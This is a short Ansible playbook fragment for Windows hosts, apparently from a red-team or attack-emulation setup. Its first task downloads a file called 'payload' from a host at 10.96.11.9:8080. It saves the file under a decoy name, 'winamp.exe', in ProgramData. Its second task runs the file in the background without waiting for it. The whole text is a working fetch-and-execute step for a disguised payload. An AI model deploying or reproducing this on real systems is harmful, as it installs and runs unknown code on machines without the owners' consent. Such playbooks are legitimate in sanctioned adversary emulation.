- name: Download payload to host
  ansible.windows.win_get_url:
    url: http://10.96.11.9:8080/winamp.exe
    dest: C:\ProgramData\Packages\winamp.exe
    
- name: Execute payload on host
  ansible.windows.win_command: C:\ProgramData\Packages\winamp.exe
  async: 10
  poll: 0
